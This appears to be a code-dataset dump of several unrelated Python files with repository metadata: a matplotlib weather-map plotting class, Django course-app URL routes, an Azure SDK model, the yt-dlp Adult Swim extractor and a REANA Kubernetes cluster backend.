def contour_plot(self, x, y, z, contour_type=None):
"""contour_plot.
Args:
x:
y:
z:
"""
X, Y = np.meshgrid(x, y)
if contour_type == "pressure":
contour = self.ax.contour(X, Y, z, colors="black",
levels=list(range(900, 1040, 4)),
linewidths=3.0,)
else:
contour = self.ax.contour(X, Y, z,
colors="black",
linewidths=3.0)
self.ax.clabel(contour, fontsize=36, fmt='%1.1f')
def color_line(self, x, y, z, line_value: Union[int, float], color="blue"):
"""color_line.
Args:
x:
y:
z:
line_value (Union[int, float]): line_value
color:
"""
X, Y = np.meshgrid(x, y)
contour = self.ax.contour(X, Y, z,
colors=color,
levels=[line_value],
linewidths=10.0,
linestyles='dashed')
self.ax.clabel(contour, fontsize=48, fmt='%1.1f')
def shade_plot(self, x, y, z, label: str, color_bar_label_min="", color_bar_label_max="", color_map_type="kishotyo"):
"""shade_plot.
make color map.
Args:
x:
y:
z:
label (str): label
color_bar_label_min:
color_bar_label_max:
"""
def _get_jmacmap():
"""_get_jmacmap.
"""
jmacolors=np.array([
[242, 242, 242, 1], # white
[160, 210, 255, 1], # light blue
[33, 140, 255, 1], # aqua
[0, 65, 255, 1], # blue
[250, 245, 0, 1], # yellow
[255, 153, 0, 1], # orange
[255, 40, 0, 1], # red
[180, 0, 104, 1]], # dark red
                dtype=float)
jmacolors[:,:3] /= 256
jmacmap=LinearSegmentedColormap.from_list("jmacmap2",colors=jmacolors)
return jmacmap
def _get_tempcmap():
"""_get_tempcmap.
"""
tempcolors=np.array([
[160, 0, 200, 1], # puple
[0, 65, 255, 1], # blue
[33, 140, 255, 1], # aqua
[160, 210, 255, 1], # light blue
[250, 245, 180, 1], # white
[250, 245, 0, 1], # yellow
[255, 153, 0, 1], # orange
[255, 40, 0, 1], # red
[180, 0, 104, 1]] # dark red
                , dtype=float)
tempcolors[:,:3] /= 256
tempcmap=LinearSegmentedColormap.from_list("tempcmap",colors=tempcolors)
return tempcmap
# initial setting of shade
plt.rcParams['font.size'] = 36
X, Y = np.meshgrid(x, y)
if color_map_type == "diff":
color_map = "RdBu_r"
elif color_map_type == "temperature":
color_map = _get_tempcmap()
else:
color_map = _get_jmacmap()
# auto color bar range(using for test).
if color_bar_label_min == "" and color_bar_label_max == "":
shade = self.ax.pcolormesh(X, Y, z, cmap=color_map)
color_bar = plt.colorbar(shade, orientation="vertical", shrink=0.7)
#color bar max min are assigned.
else:
shade = self.ax.pcolormesh(X, Y, z, cmap=color_map,
norm=Normalize(vmin=color_bar_label_min, vmax=color_bar_label_max))
shade.set_clim(color_bar_label_min, color_bar_label_max) #color bar range.
color_bar = plt.colorbar(shade, orientation="vertical", shrink=0.7)
color_bar.set_label(label, fontsize=36,)
def _skip_value(self, array, len_x: int, len_y: int, vector_interval: int):
"""skip_value.
used in vector_plot()
Args:
array:
len_x (int): len_x
len_y (int): len_y
vector_interval (int): vector_interval
"""
skiped_array = [
array[i][j]
for i in range(len_y)
for j in range(len_x)
if i%vector_interval == 0 and j % vector_interval == 0
]
return skiped_array
def vector_plot(self, x, y, u, v, vector_interval: int, vector_scale, mode=None):
"""vector_plot.
make vector map.
use _skip_value()
Args:
x:
y:
u:
v:
vector_interval (int): vector_interval
vector_scale:
"""
u_skipped = self._skip_value(u, len(x), len(y), vector_interval)
v_skipped = self._skip_value(v, len(x), len(y), vector_interval)
x_2d, y_2d = np.meshgrid(x, y)
x_2d_skipped = self._skip_value(x_2d, len(x), len(y), vector_interval)
y_2d_skipped = self._skip_value(y_2d, len(x), len(y), vector_interval)
if mode == "wind":
self.ax.barbs(x_2d_skipped, y_2d_skipped, u_skipped, v_skipped, length=7)
else:
            # If headlength is set larger than headaxislength, the arrowhead approaches a diamond shape.
self.ax.quiver(x_2d_skipped, y_2d_skipped, u_skipped, v_skipped, angles='uv',
scale_units='xy', scale=vector_scale,
headwidth=3, headlength=4, headaxislength=3.5)
def hatch_plot(self, x, y, z):
"""hatch_plot.
https://matplotlib.org/stable/gallery/images_contours_and_fields/contourf_hatching.html
Args:
x:
y:
z:
"""
x_2d, y_2d = np.meshgrid(x, y)
self.ax.contourf(x_2d, y_2d, z, hatches='.',cmap='gray', alpha=0.3)
def hatch_plot_2(self, x, y, z):
"""hatch_plot.
Args:
x:
y:
z:
"""
x_2d, y_2d = np.meshgrid(x, y)
self.ax.contourf(x_2d, y_2d, z, hatches='*',cmap='pink', alpha=0.8)
def save_fig(self, outname: str, title=None):
"""save_fig.
save figure.
Args:
outname (str): outname
title (str): title
"""
self.ax.set_title(title, fontsize=32)
bar_, label = self.ax.get_legend_handles_labels()
self.ax.legend(bar_, label, loc='upper left',
borderaxespad=0, bbox_to_anchor=(1.05, 1))
self.fig.savefig(outname, bbox_inches="tight", pad_inches=0.5)
plt.close()
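# A minimal usage sketch of the class above; coordinates and the output
# filename are illustrative only.
if __name__ == "__main__":
    wm = WorldMap(color=True)
    wm.plot_data([139.69, -0.13], [35.69, 51.51], label="cities", line=False)
    wm.save_fig("worldmap_example.png", title="example")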
| 33.812689
| 121
| 0.498302
|
347c25efe562e0fa3c64395004c7a36d953a7c9d
| 862
|
py
|
Python
|
onlinecourse/urls.py
|
pavloteyfel/ibm-online-course-app
|
f167839bad82fc270f4a192b94dd38ac7bd287b6
|
[
"Apache-2.0"
] | null | null | null |
onlinecourse/urls.py
|
pavloteyfel/ibm-online-course-app
|
f167839bad82fc270f4a192b94dd38ac7bd287b6
|
[
"Apache-2.0"
] | null | null | null |
onlinecourse/urls.py
|
pavloteyfel/ibm-online-course-app
|
f167839bad82fc270f4a192b94dd38ac7bd287b6
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
from django.conf.urls.static import static
from django.urls import path
from . import views
app_name = "onlinecourse"
urlpatterns = [
path(route="", view=views.CourseListView.as_view(), name="index"),
path("registration/", views.registration_request, name="registration"),
path("login/", views.login_request, name="login"),
path("logout/", views.logout_request, name="logout"),
path("<int:pk>/", views.CourseDetailView.as_view(), name="course_details"),
path("<int:course_id>/enroll/", views.enroll, name="enroll"),
path("<int:course_id>/submit/", views.submit, name="submit"),
path(
"course/<int:course_id>/submission/<int:submission_id>/result/",
views.show_exam_result,
name="show_exam_result",
),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
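# A minimal sketch of resolving these named routes with Django's reverse();
# the primary key is illustrative and the resulting path depends on how this
# app is included in the project URLconf.
# from django.urls import reverse
# detail_url = reverse("onlinecourse:course_details", args=[1])
# enroll_url = reverse("onlinecourse:enroll", args=[1])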
| 39.181818
| 79
| 0.700696
|
493c8d6743bf833fbb115e451642d9eab4bd6de2
| 958
|
py
|
Python
|
sdk/cognitiveservices/azure-cognitiveservices-formrecognizer/azure/cognitiveservices/formrecognizer/models/keys_result_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-formrecognizer/azure/cognitiveservices/formrecognizer/models/keys_result_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-formrecognizer/azure/cognitiveservices/formrecognizer/models/keys_result_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class KeysResult(Model):
"""Result of an operation to get
the keys extracted by a model.
:param clusters: Object mapping ClusterIds to Key lists.
:type clusters: dict[str, list[str]]
"""
_attribute_map = {
'clusters': {'key': 'clusters', 'type': '{[str]}'},
}
def __init__(self, *, clusters=None, **kwargs) -> None:
super(KeysResult, self).__init__(**kwargs)
self.clusters = clusters
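# A minimal usage sketch; the cluster ids and key names below are made up.
_example = KeysResult(clusters={"0": ["Address", "Invoice Number"], "1": ["Total"]})
assert _example.clusters["0"][0] == "Address"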
| 31.933333
| 76
| 0.574113
|
1368954bc60e065630359696cf32a7b91d3495c4
| 7,778
|
py
|
Python
|
yt_dlp/extractor/adultswim.py
|
nxtreaming/yt-dlp
|
385ffb467b2285e85a2a5495b90314ba1f8e0700
|
[
"Unlicense"
] | 11
|
2022-01-06T22:09:50.000Z
|
2022-03-12T22:26:22.000Z
|
yt_dlp/extractor/adultswim.py
|
nxtreaming/yt-dlp
|
385ffb467b2285e85a2a5495b90314ba1f8e0700
|
[
"Unlicense"
] | 4
|
2022-02-25T08:20:18.000Z
|
2022-03-17T16:16:20.000Z
|
yt_dlp/extractor/adultswim.py
|
nxtreaming/yt-dlp
|
385ffb467b2285e85a2a5495b90314ba1f8e0700
|
[
"Unlicense"
] | 3
|
2022-02-19T08:59:13.000Z
|
2022-03-06T16:11:21.000Z
|
import json
from .turner import TurnerBaseIE
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
mimetype2ext,
parse_age_limit,
parse_iso8601,
strip_or_none,
try_get,
)
class AdultSwimIE(TurnerBaseIE):
_VALID_URL = r'https?://(?:www\.)?adultswim\.com/videos/(?P<show_path>[^/?#]+)(?:/(?P<episode_path>[^/?#]+))?'
_TESTS = [{
'url': 'http://adultswim.com/videos/rick-and-morty/pilot',
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow',
'ext': 'mp4',
'title': 'Rick and Morty - Pilot',
'description': 'Rick moves in with his daughter\'s family and establishes himself as a bad influence on his grandson, Morty.',
'timestamp': 1543294800,
'upload_date': '20181127',
},
'params': {
# m3u8 download
'skip_download': True,
},
'expected_warnings': ['Unable to download f4m manifest'],
}, {
'url': 'http://www.adultswim.com/videos/tim-and-eric-awesome-show-great-job/dr-steve-brule-for-your-wine/',
'info_dict': {
'id': 'sY3cMUR_TbuE4YmdjzbIcQ',
'ext': 'mp4',
'title': 'Tim and Eric Awesome Show Great Job! - Dr. Steve Brule, For Your Wine',
'description': 'Dr. Brule reports live from Wine Country with a special report on wines. \nWatch Tim and Eric Awesome Show Great Job! episode #20, "Embarrassed" on Adult Swim.',
'upload_date': '20080124',
'timestamp': 1201150800,
},
'params': {
# m3u8 download
'skip_download': True,
},
'skip': '404 Not Found',
}, {
'url': 'http://www.adultswim.com/videos/decker/inside-decker-a-new-hero/',
'info_dict': {
'id': 'I0LQFQkaSUaFp8PnAWHhoQ',
'ext': 'mp4',
'title': 'Decker - Inside Decker: A New Hero',
'description': 'The guys recap the conclusion of the season. They announce a new hero, take a peek into the Victorville Film Archive and welcome back the talented James Dean.',
'timestamp': 1469480460,
'upload_date': '20160725',
},
'params': {
# m3u8 download
'skip_download': True,
},
'expected_warnings': ['Unable to download f4m manifest'],
}, {
'url': 'http://www.adultswim.com/videos/attack-on-titan',
'info_dict': {
'id': 'attack-on-titan',
'title': 'Attack on Titan',
'description': 'md5:41caa9416906d90711e31dc00cb7db7e',
},
'playlist_mincount': 12,
}, {
'url': 'http://www.adultswim.com/videos/streams/williams-stream',
'info_dict': {
'id': 'd8DEBj7QRfetLsRgFnGEyg',
'ext': 'mp4',
'title': r're:^Williams Stream \d{4}-\d{2}-\d{2} \d{2}:\d{2}$',
'description': 'original programming',
},
'params': {
# m3u8 download
'skip_download': True,
},
'skip': '404 Not Found',
}]
def _real_extract(self, url):
show_path, episode_path = self._match_valid_url(url).groups()
display_id = episode_path or show_path
query = '''query {
getShowBySlug(slug:"%s") {
%%s
}
}''' % show_path
if episode_path:
query = query % '''title
getVideoBySlug(slug:"%s") {
_id
auth
description
duration
episodeNumber
launchDate
mediaID
seasonNumber
poster
title
tvRating
}''' % episode_path
['getVideoBySlug']
else:
query = query % '''metaDescription
title
videos(first:1000,sort:["episode_number"]) {
edges {
node {
_id
slug
}
}
}'''
show_data = self._download_json(
'https://www.adultswim.com/api/search', display_id,
data=json.dumps({'query': query}).encode(),
headers={'Content-Type': 'application/json'})['data']['getShowBySlug']
if episode_path:
video_data = show_data['getVideoBySlug']
video_id = video_data['_id']
episode_title = title = video_data['title']
series = show_data.get('title')
if series:
title = '%s - %s' % (series, title)
info = {
'id': video_id,
'title': title,
'description': strip_or_none(video_data.get('description')),
'duration': float_or_none(video_data.get('duration')),
'formats': [],
'subtitles': {},
'age_limit': parse_age_limit(video_data.get('tvRating')),
'thumbnail': video_data.get('poster'),
'timestamp': parse_iso8601(video_data.get('launchDate')),
'series': series,
'season_number': int_or_none(video_data.get('seasonNumber')),
'episode': episode_title,
'episode_number': int_or_none(video_data.get('episodeNumber')),
}
auth = video_data.get('auth')
media_id = video_data.get('mediaID')
if media_id:
info.update(self._extract_ngtv_info(media_id, {
# CDN_TOKEN_APP_ID from:
# https://d2gg02c3xr550i.cloudfront.net/assets/asvp.e9c8bef24322d060ef87.bundle.js
'appId': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhcHBJZCI6ImFzLXR2ZS1kZXNrdG9wLXB0enQ2bSIsInByb2R1Y3QiOiJ0dmUiLCJuZXR3b3JrIjoiYXMiLCJwbGF0Zm9ybSI6ImRlc2t0b3AiLCJpYXQiOjE1MzI3MDIyNzl9.BzSCk-WYOZ2GMCIaeVb8zWnzhlgnXuJTCu0jGp_VaZE',
}, {
'url': url,
'site_name': 'AdultSwim',
'auth_required': auth,
}))
if not auth:
extract_data = self._download_json(
'https://www.adultswim.com/api/shows/v1/videos/' + video_id,
video_id, query={'fields': 'stream'}, fatal=False) or {}
assets = try_get(extract_data, lambda x: x['data']['video']['stream']['assets'], list) or []
for asset in assets:
asset_url = asset.get('url')
if not asset_url:
continue
ext = determine_ext(asset_url, mimetype2ext(asset.get('mime_type')))
if ext == 'm3u8':
info['formats'].extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id='hls', fatal=False))
elif ext == 'f4m':
continue
# info['formats'].extend(self._extract_f4m_formats(
# asset_url, video_id, f4m_id='hds', fatal=False))
elif ext in ('scc', 'ttml', 'vtt'):
info['subtitles'].setdefault('en', []).append({
'url': asset_url,
})
self._sort_formats(info['formats'])
return info
else:
entries = []
for edge in show_data.get('videos', {}).get('edges', []):
video = edge.get('node') or {}
slug = video.get('slug')
if not slug:
continue
entries.append(self.url_result(
'http://adultswim.com/videos/%s/%s' % (show_path, slug),
'AdultSwim', video.get('_id')))
return self.playlist_result(
entries, show_path, show_data.get('title'),
strip_or_none(show_data.get('metaDescription')))
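# A minimal sketch, on toy strings, of the nested %-formatting used to build
# the GraphQL query above: the outer substitution leaves a literal %s slot
# (written as %%s) that the second substitution then fills in.
_outer = 'query { getShowBySlug(slug:"%s") { %%s } }' % 'rick-and-morty'
_query = _outer % 'title'
assert _query == 'query { getShowBySlug(slug:"rick-and-morty") { title } }'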
| 39.085427
| 249
| 0.521599
|
c47ce68f5c0901a7506193083fcd50148ff15cf1
| 42,501
|
py
|
Python
|
reana_cluster/backends/kubernetes/k8s.py
|
BenGalewsky/reana-cluster
|
b631360d92886b760d56d47686774537aa4b1db5
|
[
"MIT"
] | 1
|
2019-06-27T01:21:02.000Z
|
2019-06-27T01:21:02.000Z
|
reana_cluster/backends/kubernetes/k8s.py
|
BenGalewsky/reana-cluster
|
b631360d92886b760d56d47686774537aa4b1db5
|
[
"MIT"
] | null | null | null |
reana_cluster/backends/kubernetes/k8s.py
|
BenGalewsky/reana-cluster
|
b631360d92886b760d56d47686774537aa4b1db5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018, 2019 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Abstract Base Class representing REANA cluster backend."""
import json
import logging
import os
import shlex
import subprocess
import pkg_resources
import yaml
from jinja2 import (Environment, FileSystemLoader, TemplateNotFound,
TemplateSyntaxError)
from kubernetes import client as k8s_client
from kubernetes import config as k8s_config
from kubernetes.client import Configuration
from kubernetes.client.rest import ApiException
from pkg_resources import parse_version
from reana_cluster import ReanaBackendABC
class KubernetesBackend(ReanaBackendABC):
"""A class for interacting with Kubernetes.
Attributes:
__cluster_type Type of the backend this class implements support for.
_conf Configuration.
"""
__cluster_type = 'Kubernetes'
_conf = {
'templates_folder': pkg_resources.resource_filename(
__name__, '/templates'),
'min_version': 'v1.14.0',
'max_version': 'v1.14.0',
}
def __init__(self,
cluster_spec,
cluster_conf=None,
kubeconfig=None,
kubeconfig_context=None,
cephfs=False,
cephfs_volume_size=None,
cvmfs=False,
debug=False,
url=None):
"""Initialise Kubernetes specific ReanaBackend-object.
:param cluster_spec: Dictionary representing complete REANA
cluster spec file.
:param cluster_conf: A generator/iterable of Kubernetes YAML manifests
of REANA components as Python objects. If set to `None`
cluster_conf will be generated from manifest templates in
`templates` folder specified in `_conf.templates_folder`
:param kubeconfig: Name of the kube-config file to use for configuring
reana-cluster. If set to `None` then `$HOME/.kube/config` will be
used.
            Note: Might pick up a config file defined in $KUBECONFIG as well.
:param kubeconfig_context: set the active context. If is set to `None`,
current_context from config file will be used.
:param cephfs: Boolean flag toggling the usage of a cephfs volume as
storage backend.
:param cephfs_volume_size: Int number which represents cephfs volume
size (GB)
:param cvmfs: Boolean flag toggling the mounting of cvmfs volumes in
the cluster pods.
:param debug: Boolean flag setting debug mode.
:param url: REANA cluster url.
"""
logging.debug('Creating a ReanaBackend object '
'for Kubernetes interaction.')
# Load Kubernetes cluster configuration. If reana-cluster.yaml
# doesn't specify this K8S Python API defaults to '$HOME/.kube/config'
self.kubeconfig = kubeconfig or \
cluster_spec['cluster'].get('config', None)
self.kubeconfig_context = kubeconfig_context or \
cluster_spec['cluster'].get('config_context', None)
k8s_api_client_config = Configuration()
k8s_config.load_kube_config(kubeconfig, self.kubeconfig_context,
k8s_api_client_config)
Configuration.set_default(k8s_api_client_config)
# Instantiate clients for various Kubernetes REST APIs
self._corev1api = k8s_client.CoreV1Api()
self._versionapi = k8s_client.VersionApi()
self._extbetav1api = k8s_client.ExtensionsV1beta1Api()
self._rbacauthorizationv1api = k8s_client.RbacAuthorizationV1Api()
self._storagev1api = k8s_client.StorageV1Api()
self.k8s_api_client_config = k8s_api_client_config
self.cluster_spec = cluster_spec
self.cluster_conf = cluster_conf or \
self.generate_configuration(cluster_spec,
cephfs=cephfs,
cephfs_volume_size=cephfs_volume_size,
debug=debug,
url=url)
@property
def cluster_type(self):
"""."""
return self.__cluster_type
@property
def cluster_url(self):
"""Return URL of Kubernetes instance `reana-cluster` connects to."""
return self.k8s_api_client_config.host
@property
def current_config(self):
"""Return Kubernetes configuration (e.g. `~/.kube/config`)."""
return self.k8s_api_client_config
@property
def current_kubeconfig_context(self):
"""Return K8S kubeconfig context used to initialize K8S Client(s)."""
return self.kubeconfig_context
@property
def current_kubeconfig(self):
"""Return K8S kubeconfig used to initialize K8S Client(s).
(e.g. `~/.kube/config`)
"""
return self.kubeconfig
@classmethod
def generate_configuration(cls, cluster_spec, cvmfs=False, cephfs=False,
cephfs_volume_size=None, debug=False, url=None):
"""Generate Kubernetes manifest files used to init REANA cluster.
:param cluster_spec: Dictionary representing complete REANA
cluster spec file.
:param cephfs: Boolean which represents whether REANA is
deployed with CEPH or not.
:param cephfs_volume_size: Int to set CEPH volume size in GB.
:param cvmfs: Boolean which represents whether REANA is
deployed with CVMFS or not.
:param debug: Boolean which represents whether REANA is
deployed in debug mode or not.
:param url: REANA cluster url.
:return: A generator/iterable of generated Kubernetes YAML manifests
as Python objects.
"""
# Setup an Environment for Jinja
env = Environment(
loader=FileSystemLoader(
cls._conf['templates_folder']),
keep_trailing_newline=False
)
# Define where are backend conf params needed when rendering templates.
be_conf_params_fp = cls._conf['templates_folder'] + '/config.yaml'
try:
with open(be_conf_params_fp) as f:
# Load backend conf params
backend_conf_parameters = yaml.load(f.read(),
Loader=yaml.FullLoader)
# change type of deployment (cephfs|cvmfs|hostpath)
if cephfs or cluster_spec['cluster'].get('cephfs'):
backend_conf_parameters['CEPHFS'] = True
if not cephfs_volume_size:
cephfs_volume_size = \
cluster_spec['cluster'].get(
'cephfs_volume_size',
200)
if debug or cluster_spec['cluster'].get('debug'):
backend_conf_parameters['DEBUG'] = True
if url or cluster_spec['cluster'].get('url'):
backend_conf_parameters['URL'] = True
if cluster_spec['cluster'].get('cephfs_monitors'):
backend_conf_parameters['CEPHFS_MONITORS'] = \
cluster_spec['cluster'].get('cephfs_monitors')
if cluster_spec['cluster'].get('root_path'):
backend_conf_parameters['ROOT_PATH'] = \
cluster_spec['cluster'].get('root_path')
if cluster_spec['cluster'].get('shared_volume_path'):
backend_conf_parameters['SHARED_VOLUME_PATH'] = \
cluster_spec['cluster'].get('shared_volume_path')
if cluster_spec['cluster'].get('db_persistence_path'):
backend_conf_parameters['DB_PERSISTENCE_PATH'] = \
cluster_spec['cluster'].get('db_persistence_path')
# Would it be better to combine templates or populated
# templates in Python code for improved extensibility?
# Just drop a .yaml template and add necessary to config.yaml
# without changing anything?
# Load template combining all other templates from
# templates folder
template = env.get_template('backend_conf.yaml')
components = cluster_spec['components']
rs_img = components['reana-server']['image']
rwfc_img = components['reana-workflow-controller']['image']
rmb_img = components['reana-message-broker']['image']
rs_environment = components['reana-server']\
.get('environment', [])
rwfc_environment = components['reana-workflow-controller'] \
.get('environment', [])
rmb_environment = components['reana-message-broker'] \
.get('environment', [])
rs_mountpoints = components['reana-server']\
.get('mountpoints', [])
rwfc_mountpoints = components['reana-workflow-controller']\
.get('mountpoints', [])
rmb_mountpoints = components['reana-message-broker'] \
.get('mountpoints', [])
# Render the template using given backend config parameters
cluster_conf = template.\
render(backend_conf_parameters,
REANA_URL=cluster_spec['cluster'].get(
'reana_url',
url),
CEPHFS_VOLUME_SIZE=cephfs_volume_size or 1,
SERVER_IMAGE=rs_img,
WORKFLOW_CONTROLLER_IMAGE=rwfc_img,
MESSAGE_BROKER_IMAGE=rmb_img,
RS_MOUNTPOINTS=rs_mountpoints,
RWFC_MOUNTPOINTS=rwfc_mountpoints,
RMB_MOUNTPOINTS=rmb_mountpoints,
RS_ENVIRONMENT=rs_environment,
RWFC_ENVIRONMENT=rwfc_environment,
RMB_ENVIRONMENT=rmb_environment,
)
# Strip empty lines for improved readability
cluster_conf = '\n'.join(
[line for line in cluster_conf.splitlines() if
line.strip()])
# Should print the whole configuration in a loop
# Now prints just memory address of generator object
logging.debug('Loaded K8S config successfully: \n {}'
.format(yaml.load_all(cluster_conf,
Loader=yaml.FullLoader)))
except TemplateNotFound as e:
logging.info(
                'Something went wrong when fetching K8S config file templates from '
'{filepath} : \n'
'{error}'.format(
filepath=cls._conf['templates_folder'],
error=e.strerror))
raise e
except TemplateSyntaxError as e:
logging.info(
'Something went wrong when parsing K8S template from '
'{filepath} : \n'
'{error}'.format(
filepath=e.filename,
error=e.strerror))
raise e
except IOError as e:
logging.info(
                'Something went wrong when reading the K8S config parameters file from '
'{filepath} : \n'
'{error}'.format(filepath=be_conf_params_fp,
error=e.strerror))
raise e
        # As the Jinja-rendered string is basically multiple YAML documents in
        # one string, parse it with the YAML library and return a generator of
        # independent YAML documents (split on `---`) as Python objects.
return yaml.load_all(cluster_conf, Loader=yaml.FullLoader)
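        # A minimal sketch of the Jinja2 pattern this method relies on, with a
        # toy inline template instead of the project's backend_conf.yaml:
        #   from jinja2 import Environment
        #   env = Environment(keep_trailing_newline=False)
        #   tmpl = env.from_string('image: {{ IMAGE }}')
        #   tmpl.render(IMAGE='reana-server:latest')  # -> 'image: reana-server:latest'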
def init(self, traefik):
"""Initialize REANA cluster, i.e. deploy REANA components to backend.
:param traefik: Boolean flag determines if traefik should be
initialized.
:return: `True` if init was completed successfully.
:rtype: bool
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
if not self._cluster_running():
pass
# Should check that cluster is not already initialized.
# Maybe use `verify_components()` or `get()` each component?
if traefik is True:
self.initialize_traefik()
for manifest in self.cluster_conf:
try:
logging.debug(json.dumps(manifest))
if manifest['kind'] == 'Deployment':
# REANA Job Controller needs access to K8S-cluster's
# service-account-token in order to create new Pods.
components_k8s_token = \
['reana-server', 'workflow-controller']
if manifest['metadata']['name'] in components_k8s_token:
manifest = self._add_service_acc_key_to_component(
manifest)
self._extbetav1api.create_namespaced_deployment(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'Namespace':
self._corev1api.create_namespace(body=manifest)
elif manifest['kind'] == 'ResourceQuota':
self._corev1api.create_namespaced_resource_quota(
body=manifest,
namespace=manifest['metadata']['namespace'])
elif manifest['kind'] == 'Service':
self._corev1api.create_namespaced_service(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'ClusterRole':
self._rbacauthorizationv1api.create_cluster_role(
body=manifest)
elif manifest['kind'] == 'ClusterRoleBinding':
self._rbacauthorizationv1api.\
create_cluster_role_binding(body=manifest)
elif manifest['kind'] == 'Ingress':
self._extbetav1api.create_namespaced_ingress(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'StorageClass':
self._storagev1api.create_storage_class(body=manifest)
elif manifest['kind'] == 'PersistentVolumeClaim':
self._corev1api.create_namespaced_persistent_volume_claim(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
except ApiException as e: # Handle K8S API errors
if e.status == 409:
logging.info(
'{0} {1} already exists, continuing ...'.format(
manifest['kind'],
manifest['metadata'].get('name')))
continue
if e.status == 400:
pass
raise e
return True
def initialize_traefik(self):
"""Install and initialize traefik via Helm.
        The Traefik dashboard service is not accessible by default; to make it
        accessible inside Minikube, the service type is changed to NodePort.
"""
from reana_cluster.config import (traefik_configuration_file_path,
traefik_release_name)
try:
namespace = 'kube-system'
label_selector = 'app=traefik'
cmd = ('helm install stable/traefik --namespace {} --values {} '
'--name {}').format(namespace,
traefik_configuration_file_path,
traefik_release_name)
cmd = shlex.split(cmd)
subprocess.check_output(cmd)
traefik_objects = self._corev1api.list_namespaced_service(
namespace=namespace,
label_selector=label_selector,
limit=2)
traefik_dashboard_body = None
for traefik_object in traefik_objects.items:
if 'dashboard' in traefik_object.metadata.name:
traefik_dashboard_body = traefik_object
break
traefik_dashboard_body.spec.type = 'NodePort'
self._corev1api.patch_namespaced_service(
name=traefik_dashboard_body.metadata.name,
namespace=namespace,
body=traefik_dashboard_body
)
except Exception as e:
logging.error('Traefik initialization failed \n {}.'.format(e))
raise e
def _add_service_acc_key_to_component(self, component_manifest):
"""Add K8S service account credentials to a component.
        In order to interact with the Kubernetes cluster (e.g. create Pods to
        run workflows), REANA Job Controller needs access to the API
        credentials of a Kubernetes service account.
:param component_manifest: Python object representing Kubernetes
Deployment manifest file of a REANA component generated with
`generate_configuration()`.
        :return: Python object representing the Kubernetes Deployment
            manifest file of the given component, with the service account
            credentials of the Kubernetes instance that `reana-cluster`
            is configured to interact with.
"""
# Get all secrets for default namespace
# Cannot use `k8s_corev1.read_namespaced_secret()` since
        # exact name of the token (e.g. 'default-token-8p260') is not known.
secrets = self._corev1api.list_namespaced_secret(
'default', include_uninitialized='false')
# Maybe debug print all secrets should not be enabled?
# logging.debug(k8s_corev1.list_secret_for_all_namespaces())
# K8S might return many secrets. Find `service-account-token`.
for item in secrets.items:
if item.type == 'kubernetes.io/service-account-token':
srv_acc_token = item.metadata.name
# Search for appropriate place to place the token
# in job-controller deployment manifest
for i in (component_manifest['spec']['template']['spec']
['volumes']):
if i['name'] == 'svaccount':
i['secret']['secretName'] = srv_acc_token
return component_manifest
def _cluster_running(self):
"""Verify that interaction with cluster backend is possible.
THIS IS CURRENTLY JUST A MOCKUP. NO REAL CHECKS ARE DONE.
        Verifies that the Kubernetes deployment is reachable through its REST API.
Only very basic checking is done and it is not guaranteed that REANA
cluster can be initialized, just that interaction with the specified
Kubernetes deployment is possible.
:return: `True` if Kubernetes deployment is reachable through
            its REST API.
"""
# Maybe just do a request to `/healthz/ping` -endpoint at cluster_url?
# i.e no kubernetes-python client interaction?
return True
def restart(self):
"""Restarts all deployed components. NOT CURRENTLY IMPLEMENTED.
:raises NotImplementedError:
"""
raise NotImplementedError()
def down(self):
"""Bring REANA cluster down, i.e. deletes all deployed components.
Deletes all Kubernetes Deployments, Namespaces, Resourcequotas and
Services that were created during initialization of REANA cluster.
:return: `True` if all components were destroyed successfully.
:rtype: bool
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
# What is a good propagationPolicy of `V1DeleteOptions`?
# Default is `Orphan`
# https://kubernetes.io/docs/concepts/workloads/controllers/garbage-collection/
# https://github.com/kubernetes-incubator/client-python/blob/master/examples/notebooks/create_deployment.ipynb
if not self._cluster_running():
pass
# All K8S objects seem to use default -namespace.
# Is this true always, or do we create something for non-default
# namespace (in the future)?
for manifest in self.cluster_conf:
try:
logging.debug(json.dumps(manifest))
if manifest['kind'] == 'Deployment':
self._extbetav1api.delete_namespaced_deployment(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(
propagation_policy="Foreground",
grace_period_seconds=5),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'Namespace':
self._corev1api.delete_namespace(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'ResourceQuota':
